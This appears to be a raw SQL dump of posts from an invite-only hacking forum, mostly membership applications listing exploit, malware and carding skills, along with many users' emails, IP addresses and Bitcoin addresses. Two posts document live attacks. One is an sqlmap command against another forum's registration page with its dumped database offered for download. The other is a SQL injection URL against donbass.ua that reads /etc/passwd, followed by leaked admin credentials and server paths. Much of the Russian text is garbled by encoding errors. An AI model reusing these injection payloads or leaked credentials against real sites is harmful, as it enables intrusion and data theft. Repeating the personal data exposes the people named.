(1279, 1183, 0, 'Invite', 2, 'New invite', 1405594067, '[b]Name[/b]: g0rx\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: g0r@jabber.dk\r\n [b]e-mail[/b]: g0rx@bk.ru\r\n [b]Info[/b]: Hi,I m hacker i have 0day and exploit . i want to share and get in touch ..', 1, 0, '41.142.14.62', 0, 1, 0, 0, 0),
(1280, 1184, 0, 'Invite', 2, 'New invite', 1405597398, '[b]Name[/b]: hack3core\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: ross@kaddafi.me\r\n [b]e-mail[/b]: hack3core@yahoo.com\r\n [b]Info[/b]: Pentest.Decoding.Carding.', 1, 0, '178.212.111.35', 0, 1, 0, 0, 0),
(1281, 1185, 0, 'Invite', 2, 'New invite', 1405598770, '[b]Name[/b]: frtour\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: \r\n [b]e-mail[/b]: frtour@yopmail.com\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n .', 1, 0, '185.3.135.122', 0, 1, 0, 0, 0),
(1282, 1186, 0, 'Invite', 2, 'New invite', 1405599084, '[b]Name[/b]: deadpixel\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: deadpixel@safe-mail.net\r\n [b]e-mail[/b]: deadpixel@safe-mail.net\r\n [b]Info[/b]: Exploit development/improvement\r\nC/C++/Python expert\r\nMalware development\r\nPentesting expert.', 1, 0, '209.159.142.235', 0, 1, 0, 0, 0),
(1283, 1187, 0, 'Invite', 2, 'New invite', 1405600909, '[b]Name[/b]: powersw\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: 6578844\r\n [b]e-mail[/b]: powersw@hushmail.com\r\n [b]Info[/b]: sql.', 1, 0, '46.122.155.176', 0, 1, 0, 0, 0),
(3047, 2507, 0, 'st1x0', 171, 'db icloud', 1464181751, 'Привет, где можно найти или купить базу icloud? с данными очень надо в связи с забыл свой, а труба лежит мертвым грузом. Коробки нет и чека.', 1, 0, '217.22.171.217', 0, 1, 0, 0, 0),
(1285, 1189, 0, 'Invite', 2, 'New invite', 1405625018, '[b]Name[/b]: Anonymous\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: ICQ/Jabber\r\n [b]e-mail[/b]: hadopi@outlook.com\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n Registration coast 200$\r\n we accept only BTC\r\n 12pMkQZwhdmTejeASFBoT3sQaureRnCZyE\r\n .', 1, 0, '212.83.132.195', 0, 1, 0, 0, 0),
(1286, 1190, 0, 'Invite', 2, 'New invite', 1405655972, '[b]Name[/b]: xapeka\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: 42039423\r\n [b]e-mail[/b]: xapeka@xakpe.ru\r\n [b]Info[/b]: DONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICK.', 1, 0, '203.217.39.112', 0, 1, 0, 0, 0),
(1287, 1191, 0, 'Invite', 2, 'New invite', 1405656157, '[b]Name[/b]: xapeka\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: 42039423\\\'\r\n [b]e-mail[/b]: xapeka@xakpe.ru\r\n [b]Info[/b]: DONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICK.', 1, 0, '203.217.39.112', 0, 1, 0, 0, 0),
(1288, 1192, 0, 'Invite', 2, 'New invite', 1405663464, '[b]Name[/b]: sandgun_cypher\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: ICQ/Jabber\r\n [b]e-mail[/b]: sandguncypher@gmail.com\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n Registration coast 200$\r\n we accept only BTC\r\n 12pMkQZwhdmTejeASFBoT3sQaureRnCZyE\r\n .', 1, 0, '117.243.217.129', 0, 1, 0, 0, 0),
(1289, 1193, 0, 'Invite', 2, 'New invite', 1405669712, '[b]Name[/b]: c0ld\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: ICQ/Jabber\r\n [b]e-mail[/b]: rohanbirtia@gmail.com\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n Registration coast 200$\r\n we accept only BTC\r\n 12pMkQZwhdmTejeASFBoT3sQaureRnCZyE\r\n .', 1, 0, '115.249.10.252', 0, 1, 0, 0, 0),
(1290, 1194, 0, 'Invite', 2, 'New invite', 1405691651, '[b]Name[/b]: Babar1337Khan\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: ICQ/Jabber\r\n [b]e-mail[/b]: babar1337khan@gmail.com\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n Registration coast 200$\r\n we accept only BTC\r\n 12pMkQZwhdmTejeASFBoT3sQaureRnCZyE\r\n .', 1, 0, '182.185.0.148', 0, 1, 0, 0, 0),
(1291, 1083, 1224, 'null', 9, '', 1405702017, '[quote=bo0om;1224]ÑÂúуÃȄÂ\r\nóрðц, ÑÂûøòðù, ÿøшø ò öðñу, [email]mb@exploit.im[/email]\r\nрð÷óþòðрøòðù þ цõýõ.[/quote]\r\n\r\nñûѠòøôøüþ ѠþтÿуÑÂúþü ÿрþôþñðû ÿрþфøт , ÿþóþòþрø Ѡчõûþü õÑÂûø õÑÂть òрõüÑÂ?', 1, 0, '95.153.170.124', 0, 1, 0, 0, 0),
(1292, 1083, 1291, 'w0rm', 1, '', 1405702258, 'Ñ ÑÂýøü ÑÂÿøÑÂыòðÃȄÂѠø ôþñðòøû ÑÂюôð ýð фþруü, ÑÂûøûø рðýьшõ ÑÂтþт шþÿ чõü üы ýðшûø øýьõúцøю. ;(', 1, 0, '178.44.218.20', 0, 1, 0, 0, 0),
(1293, 1195, 0, 'w0rm', 1, 'http://raspberry.ws', 1405707041, 'þчõрõôýþù úðрôøýó ñþрô.\r\n÷ð ðòтþрÑÂтòþü [B]hackdays[/B]\r\n[URL=\"http://195.3.144.88/raspberry.ws.zip\"]download[/URL]', 1, 0, '178.44.169.39', 0, 1, 0, 0, 0),
(1294, 1196, 0, 'w0rm', 1, 'proclub.ws', 1405718951, '[code]\r\nsqlmap.py -u \"http://www.proclub.ws/forum/register.php?do=register\" --data=\"s=&securitytoken=guest&do=addmember&url=index.php&agree=1&password_md5=44fdec47036f482b68b748f9d786801b&passwordconfirm_md5=44fdec47036f482b68b748f9d786801b&day=0&month=0&year=0&invitecode=12345%27%22&username=ssss&password=&passwordconfirm=&email=sss%40mail.ru&emailconfirm=ssss%40mail.ru&nospamnumber=0&nospam=2&userfield%5Bfield5%5D=N%2FA&userfield%5Bfield5_set%5D=1&referrername=&timezoneoffset=0&dst=\" --dbs\r\n[/code]\r\n\r\n[*] cpro_main\r\n\r\n[*] crdclub_mpro_crdclub\r\n\r\n[*] information_schema\r\n\r\n[*] proclub_db\r\n\r\n[*] verified\r\n\r\n[*] verified_new\r\n\r\n[URL=\"sftp://195.3.144.88/proclub_db.zip\"]download[/URL]', 1, 0, '178.44.169.39', 0, 1, 0, 0, 0),
(1297, 1199, 0, 'Invite', 2, 'New invite', 1405749430, '[b]Name[/b]: Barakat\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: ICQ/Jabber\r\n [b]e-mail[/b]: pw21@yahoo.com\r\n [b]Info[/b]: [#]My name: MahmoudBarakat .\r\n[#]Iam From Egypt .\r\n[#]In Egyptian Shell Team .\r\n[#]I have experienced in:\r\n[#]Spamming - website hacking - security .\r\n[#]I hope that joined the buying and selling of vulnerabilities.\r\n[#]Some of the vulnerabilities you deal with it in advance: \r\n[#]XSS - Sql injection - LFI - RFI - UploadShell - BufferOverflow - CSRF - vuln of joomla - vuln of wordpress - jce - DDos .\r\n[#]GoodLuck\r\n[+]Barakat..', 1, 0, '41.129.38.2', 0, 1, 0, 0, 0),
(1298, 1200, 0, 'Invite', 2, 'New invite', 1405777728, '[b]Name[/b]: aamsyar3\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: \r\n [b]e-mail[/b]: aamsyar3@gmail.com\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n Registration coast 200$\r\n we accept only BTC\r\n 12pMkQZwhdmTejeASFBoT3sQaureRnCZyE\r\n .', 1, 0, '183.171.168.209', 0, 1, 0, 0, 0),
(1299, 1201, 0, 'Invite', 2, 'New invite', 1405777762, '[b]Name[/b]: aamsyar3\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: \r\n [b]e-mail[/b]: aamsyar3@gmail.com\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n Registration coast 200$\r\n we accept only BTC\r\n 12pMkQZwhdmTejeASFBoT3sQaureRnCZyE\r\n .', 1, 0, '183.171.168.209', 0, 1, 0, 0, 0),
(1300, 1202, 0, 'Invite', 2, 'New invite', 1405777855, '[b]Name[/b]: Abr1k0s\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: \r\n [b]e-mail[/b]: Helm@list.ru\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n Registration coast 200$\r\n we accept only BTC\r\n 12pMkQZwhdmTejeASFBoT3sQaureRnCZyE\r\n .', 1, 0, '93.187.180.159', 0, 1, 0, 0, 0),
(1301, 1203, 0, 'Invite', 2, 'New invite', 1405814446, '[b]Name[/b]: h0x\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: \r\n [b]e-mail[/b]: h0x@offensive-security.it\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n Registration coast 200$\r\n we accept only BTC\r\n 12pMkQZwhdmTejeASFBoT3sQaureRnCZyE\r\n .', 1, 0, '151.15.145.76', 0, 1, 0, 0, 0),
(1295, 1197, 0, 'Invite', 2, 'New invite', 1405722042, '[b]Name[/b]: Stelios\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: ICQ/Jabber\r\n [b]e-mail[/b]: steliosmaniak4@gmail.com\r\n [b]Info[/b]: ITsecurity,Security Researcher,Ethical Hacker\r\n .', 1, 0, '87.202.9.9', 0, 1, 0, 0, 0),
(1296, 1198, 0, 'Invite', 2, 'New invite', 1405724295, '[b]Name[/b]: AN0NT0XIC\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: ICQ/Jabber\r\n [b]e-mail[/b]: steliosmaniak4@gmail.com\r\n [b]Info[/b]: .', 1, 0, '87.202.9.9', 0, 1, 0, 0, 0),
(1302, 1204, 0, 'Invite', 2, 'New invite', 1405877994, '[b]Name[/b]: goaut\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: goaut@jappix.com\r\n [b]e-mail[/b]: Email\r\n [b]Info[/b]: 1.Опыт в поиске web уязвимостях\r\n2.Пишу сплоенты под разные cms(в исходниках ариэнтируюсь замечательно )\r\n3.Знаю php,c,c++,c#,vb,vb.net\r\n\r\n .', 1, 0, '88.81.41.168', 0, 1, 0, 0, 0),
(1303, 1205, 0, 'w0rm', 1, 'úþýтðúты úþüðýôы.', 1405879200, 'ò ôðýýþü тþÿøúõ ÑÂþñøрðõü ðúтуðûьýыõ úþýтðúты òÑÂõх учðÑÂтýøúþò ÿрþõúтð.\r\nÿрøüõр:\r\n[quote]\r\nw0rm.\r\nJabber: [email]root@w0rm.in[/email][/quote]', 1, 0, '95.71.229.228', 0, 1, 0, 0, 0),
(1304, 1206, 0, 'w0rm', 1, 'úþýфõрõýцøѠw0rm.in', 1405879274, 'ßрõôûþóðю ÑÂþñрðть jabber úþýфу ýð ÑÂûõôующõù ýõôõûõ ø þñÑÂуôøть ýðшø ÿûðýы ýð ñуôущõõ.', 1, 0, '95.71.229.228', 0, 1, 0, 0, 0),
(1305, 1206, 1304, 'null', 9, '', 1405892347, '[quote=w0rm;1304]ÿрõôûþóðю ÑÂþñрðть jabber úþýфу ýð ÑÂûõôующõù ýõôõûõ ø þñÑÂуôøть ýðшø ÿûðýы ýð ñуôущõõ.[/quote]\r\n\r\nÑÂþóûðÑÂõý ÿþÑÂûõ 28 чøÑÂûð, üыÑÂûõù ø ÿрõôûþöõýøù üýþóþ))', 1, 0, '95.153.199.64', 0, 1, 0, 0, 0),
(1306, 1205, 1303, 'kx00', 6, '', 1405917433, 'Jabber: [email]m0estr0@exploit.im[/email] \r\nMail: [email]kx00ru@gmail.com[/email]', 1, 1, '31.192.254.207', 0, 1, 0, 0, 0),
(1307, 1207, 0, 'Invite', 2, 'New invite', 1405945485, '[b]Name[/b]: overraidy\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: overraidy\r\n [b]e-mail[/b]: overraidy@gmail.com\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n Registration coast 200$\r\n we accept only BTC\r\n 1EBs4QeCv6eAUQaNQhwnTjVa78ZBwJ7aUB\r\n .', 1, 0, '181.40.78.42', 0, 1, 0, 0, 0),
(1308, 1205, 1306, 'Psych0tr1a', 11, '', 1405957495, 'icq: 277777777\r\njabber: [email]Psych0tr1a@jabber.cz[/email]\r\ne-mail: [email]w@inbox.ru[/email]', 1, 0, '91.78.171.217', 0, 1, 0, 0, 0),
(1309, 1205, 1308, 'hackdays', 23, '', 1405957647, 'Jabber: [email]hackdays@exploit.im[/email]', 1, 0, '119.81.9.17', 0, 1, 0, 0, 0),
(1310, 1208, 0, 'Invite', 2, 'New invite', 1405968883, '[b]Name[/b]: Boeira\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: ICQ/Jabber\r\n [b]e-mail[/b]: me@marceloboeira.com\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n Registration coast 200$\r\n we accept only BTC\r\n 1EBs4QeCv6eAUQaNQhwnTjVa78ZBwJ7aUB\r\n .', 1, 0, '189.30.233.135', 0, 1, 0, 0, 0),
(1311, 1209, 0, 'Invite', 2, 'New invite', 1406012552, '[b]Name[/b]: Errorz\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: error@jabber.at\r\n [b]e-mail[/b]: Fad3sniFF@gmail.com\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n Registration coast 200$\r\n we accept only BTC\r\n 1EBs4QeCv6eAUQaNQhwnTjVa78ZBwJ7aUB\r\n .', 1, 0, '68.41.117.54', 0, 1, 0, 0, 0),
(1312, 1210, 0, 'Invite', 2, 'New invite', 1406031571, '[b]Name[/b]: Nickname\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: ICQ/Jabber\r\n [b]e-mail[/b]: Email\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n Registration coast 200$\r\n we accept only BTC\r\n 1EBs4QeCv6eAUQaNQhwnTjVa78ZBwJ7aUB\r\n .', 1, 0, '95.211.174.70', 0, 1, 0, 0, 0),
(1314, 1205, 1309, 'Ereee', 19, '', 1406049840, 'Ereee\r\nICQ 27795', 1, 0, '95.141.43.237', 0, 1, 0, 0, 0),
(1315, 1211, 0, 'Psych0tr1a', 11, 'donbass.ua', 1406059855, '[B]IP хþÑÂтð:[/B]\r\n[code]91.229.78.2[/code]\r\n\r\n[B]Ãâ€Ã¾Ã¼ÃµÃ½Ñ‹ ýð ýõü:[/B]\r\n[code]donbass.ua\r\nold.donbass.ua\r\npda.donbass.ua\r\nwww.donbass.ua[/code]\r\n\r\n[B]Úðчðõüыù .htaccess [/B]\r\n[code]http://91.229.78.2/.htaccess[/code]\r\n\r\n[B]SQLi[/B]\r\n[code]http://old.donbass.ua/news.php?type=-2\'+union+select+1,load_file(\'/etc/passwd\'),3,4+--+[/code]\r\n\r\nÃâ€Ã°Ã½Ã½Ñ‹Ãµ ôûѠòхþôð ò ðôüøýþчúу:\r\n[code]Data Found: login,passw,admin=ad_web^1A2N@_new^1\r\nData Found: login,passw,admin=REDucka^!geRb1^1\r\nData Found: login,passw,admin=web_2^21bs19HL@Sm^1[/code]\r\n\r\nÃÂð ÑÂõрòõ ýðшûøÑÂÑŒ фðùûøúø:\r\n[code]/etc/php5/apache2/php.ini\r\n/etc/proftpd/proftpd.conf\r\netc/mysql/my.conf\r\n\r\n[/code]\r\n\r\nýуöýþ ýðùтø httpd.conf øûø õüу ÿþôþñýыù фðùû\r\n\r\nà ðÑÂúрытøѠÿþúð ýõт ýþ òþ÷üþöýþ ÿþÑÂòøтÑÂѠúþóôð òúûючðт þÑÂтðûьýыõ ôþüõýы.\r\n\r\nßðÿþчúø:\r\n[code]\r\nhttp://old.donbass.ua/admin/\r\nhttp://old.donbass.ua/admin/css/\r\nhttp://old.donbass.ua/admin/lib/\r\nhttp://old.donbass.ua/admin/modules/\r\nhttp://old.donbass.ua/css/\r\nhttp://old.donbass.ua/download/\r\nhttp://old.donbass.ua/download/file/\r\nhttp://old.donbass.ua/download/image/\r\nhttp://old.donbass.ua/download/test/\r\nhttp://old.donbass.ua/i/\r\nhttp://old.donbass.ua/icons/\r\nhttp://old.donbass.ua/images/\r\nhttp://old.donbass.ua/js/\r\n\r\n\r\n\r\n\r\n\r\n\r\n[/code]\r\n\r\n[code]\r\nhttp://91.229.78.2/doc/\r\nhttp://91.229.78.2/icons/\r\nhttp://91.229.78.2/images/\r\n\r\n\r\n\r\n\r\n\r\n[/code]\r\n\r\n[code]\r\nhttp://donbass.ua/admin/\r\nhttp://donbass.ua/admin/login/\r\nhttp://donbass.ua/admin/modules/\r\nhttp://donbass.ua/css/\r\nhttp://donbass.ua/icons/\r\nhttp://donbass.ua/images/\r\nhttp://donbass.ua/inc/\r\nhttp://donbass.ua/js/\r\nhttp://donbass.ua/templates/\r\nhttp://donbass.ua/templates/admin/\r\nhttp://donbass.ua/templates/admin/navigate/\r\nhttp://donbass.ua/templates/admin/system/filter/\r\nhttp://donbass.ua/templates/admin/system/logs/\r\nhttp://donbass.ua/templates/admin/system/message/\r\nhttp://donbass.ua/templates/admin/system/menu/\r\nhttp://donbass.ua/templates/admin/js/\r\nhttp://donbass.ua/swf/\r\n\r\n\r\n\r\n\r\n[/code]', 1, 0, '91.78.171.217', 0, 1, 0, 0, 0),
(1316, 1211, 1315, 'w0rm', 1, '', 1406060171, 'Cûðòð уúрðøýõ, óõрþÑÂü ÑÂûðòð )', 1, 0, '178.45.196.143', 0, 1, 0, 0, 0),
(1317, 1211, 1316, 'hackdays', 23, '', 1406087770, 'áûðòð ãúрðøýõ-ÓõрþÑÂü áðûð :rolleyes:', 1, 0, '46.158.43.203', 0, 1, 0, 0, 0),
(1318, 1212, 0, 'Invite', 2, 'New invite', 1406097812, '[b]Name[/b]: m0\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: 8112323\r\n [b]e-mail[/b]: evren@superbug.co\r\n [b]Info[/b]: exploit dev.', 1, 0, '46.196.249.169', 0, 1, 0, 0, 0),
(1319, 1213, 0, 'Invite', 2, 'New invite', 1406118025, '[b]Name[/b]: helloaa\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: ICQ/Jabber\r\n [b]e-mail[/b]: oyun4@yandex.com\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n Registration coast 200$\r\n we accept only BTC\r\n 1EBs4QeCv6eAUQaNQhwnTjVa78ZBwJ7aUB\r\n .', 1, 0, '176.10.100.226', 0, 1, 0, 0, 0),
(1320, 1214, 0, 'Invite', 2, 'New invite', 1406131030, '[b]Name[/b]: pwnsauce\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: ICQ/Jabber\r\n [b]e-mail[/b]: qlmjptlo@sharklasers.com\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n Registration coast 200$\r\n we accept only BTC\r\n 1EBs4QeCv6eAUQaNQhwnTjVa78ZBwJ7aUB\r\n .', 1, 0, '77.95.225.40', 0, 1, 0, 0, 0),
(1321, 1215, 0, 'Invite', 2, 'New invite', 1406135903, '[b]Name[/b]: tejo\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: ICQ/Jabber\r\n [b]e-mail[/b]: tejobro1@gmail.com\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n Registration coast 200$\r\n we accept only BTC\r\n 1EBs4QeCv6eAUQaNQhwnTjVa78ZBwJ7aUB\r\n .', 1, 0, '141.0.10.66', 0, 1, 0, 0, 0),
(1322, 1216, 0, 'Invite', 2, 'New invite', 1406136813, '[b]Name[/b]: mailme19245\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: mailme19245@w0rm.in\r\n [b]e-mail[/b]: mailme19245@gmail.com\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n Registration coast 200$\r\n we accept only BTC\r\n 1EBs4QeCv6eAUQaNQhwnTjVa78ZBwJ7aUB\r\n .', 1, 0, '88.80.29.41', 0, 1, 0, 0, 0),
(1323, 1217, 0, 'Invite', 2, 'New invite', 1406142831, '[b]Name[/b]: Pilot\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: Vpacoinc@jabber.org\r\n [b]e-mail[/b]: Vpacoinc@gmail.com\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n Registration coast 200$\r\n we accept only BTC\r\n 1EBs4QeCv6eAUQaNQhwnTjVa78ZBwJ7aUB\r\n .', 1, 0, '77.37.214.79', 0, 1, 0, 0, 0),
(1335, 1222, 0, 'Invite', 2, 'New invite', 1406361292, '[b]Name[/b]: p4cm4n\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: p4cm4n@jabber.ccc.de\r\n [b]e-mail[/b]: Egary1272@gustr.com\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n Registration coast 200$\r\n we accept only BTC\r\n 1EBs4QeCv6eAUQaNQhwnTjVa78ZBwJ7aUB\r\n .', 1, 0, '197.8.28.169', 0, 1, 0, 0, 0),
(1328, 1205, 1314, 'Bo0om', 7, '', 1406186682, 'jab [email]bo0om@onsec.ru[/email]\r\nicq (рõôúþ ò ýõù) 1131111', 1, 0, '90.189.5.12', 0, 1, 0, 0, 0),
(1329, 1219, 0, 'Invite', 2, 'New invite', 1406198023, '[b]Name[/b]: DouAda\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: ICQ/Jabber\r\n [b]e-mail[/b]: doad_51@yahoo.co.uk\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n Registration coast 200$\r\n we accept only BTC\r\n 1EBs4QeCv6eAUQaNQhwnTjVa78ZBwJ7aUB\r\n .', 1, 0, '194.8.124.3', 0, 1, 0, 0, 0),
(1333, 1221, 0, 'Invite', 2, 'New invite', 1406322468, '[b]Name[/b]: attila\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: ICQ/Jabber\r\n [b]e-mail[/b]: geciciuser@gmail.com\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n Registration coast 200$\r\n we accept only BTC\r\n 1EBs4QeCv6eAUQaNQhwnTjVa78ZBwJ7aUB\r\n .', 1, 0, '88.233.18.38', 0, 1, 0, 0, 0),
(1332, 1220, 0, 'Invite', 2, 'New invite', 1406262169, '[b]Name[/b]: r0x0rm3\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: ICQ/Jabber\r\n [b]e-mail[/b]: r0x0rm3.n3p@gmail.com\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n Registration coast 200$\r\n we accept only BTC\r\n 1EBs4QeCv6eAUQaNQhwnTjVa78ZBwJ7aUB\r\n .', 1, 0, '182.50.66.67', 0, 1, 0, 0, 0),
(1336, 1223, 0, 'Invite', 2, 'New invite', 1406843333, '[b]Name[/b]: 222\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: 22222\r\n [b]e-mail[/b]: 222\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n Registration coast 200$\r\n we accept only BTC\r\n 1EBs4QeCv6eAUQaNQhwnTjVa78ZBwJ7aUB\r\n .', 1, 0, '178.32.181.105', 0, 1, 0, 0, 0),
